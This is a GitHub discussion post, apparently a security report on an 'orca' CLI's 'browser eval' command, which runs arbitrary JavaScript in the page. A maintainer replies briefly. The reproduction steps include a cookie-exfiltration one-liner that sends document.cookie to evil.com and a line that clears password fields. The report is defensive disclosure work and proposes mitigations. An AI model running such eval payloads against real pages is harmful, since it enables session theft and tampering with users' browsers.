Replies: 1 comment
-
|
We use https://github.com/vercel-labs/agent-browser If you can get these merged upstream, we can consider them here. |
Beta Was this translation helpful? Give feedback.
0 replies
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
-
Security Issue: Unrestricted JavaScript Evaluation via Browser Eval Command
Description
The
browser evalcommand accepts and executes arbitrary JavaScript expressions from user input without any sanitization or sandboxing restrictions, enabling code injection and XSS-like attacks.Context
src/cli/handlers/browser-nav.ts:76-81orca browser eval --expression <js-code>Current Behavior
The
evalhandler directly passes user input to the browser'sevaluate()function:The runtime then executes it directly in the browser page context:
Expected Behavior
JavaScript evaluation should be restricted to a safe subset, require explicit user confirmation, or be sandboxed to prevent access to sensitive browser APIs.
Steps to Reproduce
orca browser goto https://example.com)orca browser eval --expression "document.cookie"orca browser eval --expression "window.location.href='http://evil.com/steal?c='+encodeURIComponent(document.cookie)"orca browser eval --expression "document.querySelectorAll('input[type=password]').forEach(i=>i.value='')"Suggested Fix
Option 1: Add confirmation prompt
Option 2: Implement expression whitelist
Option 3: Deprecate and provide safer alternatives
--eval-unsafeflag with confirmation (for power users)browser get --property title,browser get --property url, etc.Impact
document.cookieEnvironment
Additional Context
While this feature is powerful for debugging and automation, unrestricted JavaScript execution represents a significant security surface. The browser context has access to:
A compromised agent script or malicious user input could exploit this to steal credentials, tamper with user data, or perform unauthorized actions in the browser.
Positively — happy to submit a PR if this is welcome.
Beta Was this translation helpful? Give feedback.
All reactions